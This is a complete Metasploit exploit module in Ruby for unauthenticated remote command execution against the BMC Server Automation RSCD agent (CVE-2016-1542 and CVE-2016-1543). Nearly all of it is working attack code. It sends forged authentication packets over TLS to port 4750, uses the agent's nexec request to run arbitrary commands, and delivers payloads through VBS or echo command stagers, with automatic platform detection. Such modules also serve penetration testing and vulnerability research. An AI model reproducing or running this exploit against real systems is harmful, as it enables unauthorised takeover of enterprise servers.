BMC Server Automation RSCD Agent NSH Remote Command Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Exploit::Remote::Tcp  
include Msf::Exploit::CmdStager  
include Msf::Exploit::Powershell  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'BMC Server Automation RSCD Agent NSH Remote ' \  
'Command Execution',  
'Description' => %q(  
This module exploits a weak access control check in the BMC Server  
Automation RSCD agent that allows arbitrary operating system commands  
to be executed without authentication.  
Note: Under Windows, non-powershell commands may need to be prefixed  
with 'cmd /c'.  
),  
'Author' =>  
[  
'Olga Yanushkevich, ERNW <@yaole0>', # Vulnerability discovery  
'Nicky Bloor (@NickstaDB) <[email protected]>' # RCE payload and Metasploit module  
],  
'References' =>  
[  
['URL', 'https://insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/'],  
['URL', 'https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/'],  
['URL', 'https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/'],  
['CVE', '2016-1542'],  
['CVE', '2016-1543']  
],  
'DisclosureDate' => 'Mar 16 2016',  
'Privileged' => false,  
'Stance' => Msf::Exploit::Stance::Aggressive,  
'Platform' => %w[win linux unix],  
'Targets' =>  
[  
['Automatic', {}],  
[  
'Windows/VBS Stager', {  
'Platform' => 'win',  
'Payload' => { 'Space' => 8100 }  
}  
],  
[  
'Unix/Linux', {  
'Platform' => %w[linux unix],  
'Payload' => { 'Space' => 32_700 }  
}  
],  
[  
'Generic Command', {  
'Arch' => ARCH_CMD,  
'Platform' => %w[linux unix win]  
}  
]  
],  
'DefaultTarget' => 0,  
'License' => MSF_LICENSE,  
'Payload' => {  
'BadChars' => "\x00\x09\x0a"  
},  
'CmdStagerFlavor' => %w[vbs echo])  
)  
  
register_options(  
[  
Opt::RPORT(4750)  
]  
)  
  
deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')  
end  
  
def check  
# Send agentinfo request and check result  
vprint_status('Checking for BMC with agentinfo request.')  
res = send_agentinfo_request  
  
# Check for successful platform detection  
if res[0] == 1  
vprint_good('BMC RSCD agent detected, platform appears to be ' + res[1])  
return CheckCode::Detected  
end  
  
# Get first four bytes of the packet which should hold the content length  
res_len = res[1] && res[1].length > 3 ? res[1][0..3].unpack('N')[0] : 0  
  
# Return unknown if the packet format appears correct (length field check)  
if res[1] && res[1].length - 4 == res_len  
vprint_warning('Target appears to be BMC, however an unexpected ' \  
'agentinfo response was returned.')  
vprint_warning('Response: ' + res[1])  
return CheckCode::Unknown  
end  
  
# Invalid response, probably not a BMC RSCD target  
vprint_error('The target does not appear to be a BMC RSCD agent.')  
vprint_error('Response: ' + res[1]) if res[1]  
CheckCode::Safe  
end  
  
def exploit  
# Do auto target selection  
target_name = target.name  
  
if target_name == 'Automatic'  
# Attempt to detect the target platform  
vprint_status('Detecting remote platform for auto target selection.')  
platform = send_agentinfo_request  
  
# Fail if platform detection was unsuccessful  
if platform[0].zero?  
fail_with(Failure::UnexpectedReply, 'Unexpected response while ' \  
'detecting target platform.')  
end  
  
# Set target based on returned platform  
target_name = if platform[1].downcase.include?('windows')  
'Windows/VBS Stager'  
else  
'Unix/Linux'  
end  
end  
  
# Exploit based on target  
vprint_status('Generating and delivering payload.')  
if target_name == 'Windows/VBS Stager'  
if payload.raw.start_with?('powershell', 'cmd')  
execute_command(payload.raw)  
else  
execute_cmdstager(flavor: :vbs, linemax: payload.space)  
end  
handler  
elsif target_name == 'Unix/Linux'  
execute_cmdstager(flavor: :echo, linemax: payload.space)  
handler  
elsif target_name == 'Generic Cmd'  
send_nexec_request(payload.raw, true)  
end  
end  
  
# Execute a command but don't print output  
def execute_command(command, opts = {})  
if opts[:flavor] == :vbs  
if command.start_with?('powershell') == false  
if command.start_with?('cmd') == false  
send_nexec_request('cmd /c ' + command, false)  
return  
end  
end  
end  
send_nexec_request(command, false)  
end  
  
# Connect to the RSCD agent and execute a command via nexec  
def send_nexec_request(command, show_output)  
# Connect and auth  
vprint_status('Connecting to RSCD agent and sending fake auth.')  
connect_to_rscd  
send_fake_nexec_auth  
  
# Generate and send the payload  
vprint_status('Sending command to execute.')  
sock.put(generate_cmd_pkt(command))  
  
# Finish the nexec request  
sock.put("\x00\x00\x00\x22\x30\x30\x30\x30\x30\x30\x31\x61\x30\x30\x30" \  
"\x30\x30\x30\x31\x32\x77\x38\x30\x3b\x34\x31\x3b\x33\x39\x30" \  
"\x35\x38\x3b\x32\x34\x38\x35\x31")  
sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \  
"\x30\x30\x30\x30\x32\x65\x7f")  
sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \  
"\x30\x30\x30\x30\x32\x69\x03")  
sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \  
"\x30\x30\x30\x30\x32\x74\x31")  
sock.put("\x00\x00\x00\x1c\x30\x30\x30\x30\x30\x30\x31\x34\x30\x30\x30" \  
"\x30\x30\x30\x30\x63\x77\x38\x30\x3b\x34\x31\x3b\x38\x30\x3b" \  
"\x34\x31")  
sock.put("\x00\x00\x00\x11\x30\x30\x30\x30\x30\x30\x30\x39\x30\x30\x30" \  
"\x30\x30\x30\x30\x31\x7a")  
  
# Get the response from the RSCD agent and disconnect  
vprint_status('Reading response from RSCD agent.')  
res = read_cmd_output  
if show_output == true  
if res && res[0] == 1  
print_good("Output\n" + res[1])  
else  
print_warning('Command execution failed, the command may not exist.')  
vprint_warning("Output\n" + res[1])  
end  
end  
disconnect  
end  
  
# Attempt to retrieve RSCD agent info and return the platform string  
def send_agentinfo_request  
# Connect and send fake auth  
vprint_status('Connecting to RSCD agent and sending fake auth.')  
connect_to_rscd  
send_fake_agentinfo_auth  
  
# Send agentinfo request, read the response, and disconnect  
vprint_status('Requesting agent information.')  
sock.put("\x00\x00\x00\x32\x30\x30\x30\x30\x30\x30\x32\x61\x30\x30\x30" \  
"\x30\x30\x30\x31\x30\x36\x34\x3b\x30\x3b\x32\x3b\x36\x66\x37" \  
"\x3b\x38\x38\x30\x3b\x30\x30\x30\x30\x30\x30\x30\x30\x32\x34" \  
"\x31\x30\x30\x30\x30\x30\x30\x30\x30")  
res = sock.get_once  
disconnect  
  
# Return the platform field from the response if it looks valid  
res_len = res.length > 3 ? res[0..3].unpack('N')[0] : 0  
return [1, res.split(';')[4]] if res &&  
res.split(';').length > 6 &&  
res.length == (res_len + 4)  
  
# Invalid or unexpected response format, return the complete response  
[0, res]  
end  
  
# Connect to the target and upgrade to an encrypted connection  
def connect_to_rscd  
connect  
sock.put('TLS')  
sock.extend(Rex::Socket::SslTcp)  
sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)  
sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE  
sock.sslctx.options = OpenSSL::SSL::OP_ALL  
sock.sslctx.ciphers = 'ALL'  
sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)  
sock.sslsock.connect  
end  
  
# Send fake agentinfo auth packet and ignore the response  
def send_fake_agentinfo_auth  
sock.put("\x00\x00\x00\x5e\x30\x30\x30\x30\x30\x30\x35\x36\x30\x30\x30" \  
"\x30\x30\x30\x31\x31\x36\x35\x3b\x30\x3b\x33\x35\x3b\x38\x38" \  
"\x30\x3b\x38\x38\x30\x3b\x30\x30\x30\x30\x30\x30\x30\x33\x35" \  
"\x30\x3b\x30\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x39" \  
"\x3b\x61\x67\x65\x6e\x74\x69\x6e\x66\x6f\x3b\x2d\x3b\x2d\x3b" \  
"\x30\x3b\x2d\x3b\x31\x3b\x31\x3b\x37\x3b" + rand_text_alpha(7) +  
"\x3b\x55\x54\x46\x2d\x38")  
sock.get_once  
end  
  
# Send fake nexec auth packet and ignore the response  
def send_fake_nexec_auth  
sock.put("\x00\x00\x00\x5a\x30\x30\x30\x30\x30\x30\x35\x32\x30\x30\x30" \  
"\x30\x30\x30\x31\x31\x36\x35\x3b\x30\x3b\x33\x31\x3b\x64\x61" \  
"\x34\x3b\x64\x61\x34\x3b\x30\x30\x30\x30\x30\x30\x30\x33\x31" \  
"\x30\x3b\x30\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x35" \  
"\x3b\x6e\x65\x78\x65\x63\x3b\x2d\x3b\x2d\x3b\x30\x3b\x2d\x3b" \  
"\x31\x3b\x31\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x55" \  
"\x54\x46\x2d\x38")  
sock.get_once  
end  
  
# Generate a payload packet  
def generate_cmd_pkt(command)  
# Encode back slashes  
pkt = command.gsub('\\', "\xc1\xdc")  
  
# Encode double quotes unless powershell is being used  
pkt = pkt.gsub('"', "\xc2\x68") unless pkt.start_with?('powershell')  
  
# Construct the body of the payload packet  
pkt = pad_number(pkt.length + 32) + "\x30\x30\x30\x30\x30\x30\x31\x30" \  
"\x62\x37\x3b\x30\x3b\x32\x3b\x63\x61\x65\x3b\x64\x61\x34\x3b\x30" +  
pad_number(pkt.length) + pkt  
  
# Prefix with the packet length and return  
[pkt.length].pack('N') + pkt  
end  
  
# Convert the given number to a hex string padded to 8 chars  
def pad_number(num)  
format('%08x', num)  
end  
  
# Read the command output from the server  
def read_cmd_output  
all_output = ''  
response_done = false  
  
# Read the entire response from the RSCD service  
while response_done == false  
# Read a response chunk  
chunk = sock.get_once  
next unless chunk && chunk.length > 4  
chunk_len = chunk[0..3].unpack('N')[0]  
chunk = chunk[4..chunk.length]  
chunk += sock.get_once while chunk.length < chunk_len  
  
# Check for the "end of output" chunk  
if chunk_len == 18 && chunk.start_with?("\x30\x30\x30\x30\x30\x30\x30" \  
"\x61\x30\x30\x30\x30\x30\x30" \  
"\x30\x32\x78")  
# Response has completed  
response_done = true  
elsif all_output == ''  
# Keep the first response chunk as-is  
all_output += chunk  
  
# If the command failed, we're done  
response_done = true unless all_output[8..15].to_i(16) != 1  
else  
# Append everything but the length fields to the output buffer  
all_output += chunk[17..chunk.length]  
end  
end  
  
# Return output if response indicated success  
return [1, all_output[26..all_output.length]] if  
all_output &&  
all_output.length > 26 &&  
all_output[8..15].to_i(16) == 1  
  
# Return nothing if there isn't enough data for error output  
return [0, ''] unless all_output && all_output.length > 17  
  
# Get the length of the error output and return the error  
err_len = all_output[8..15].to_i(16) - 1  
[0, all_output[17..17 + err_len]]  
end  
end  
`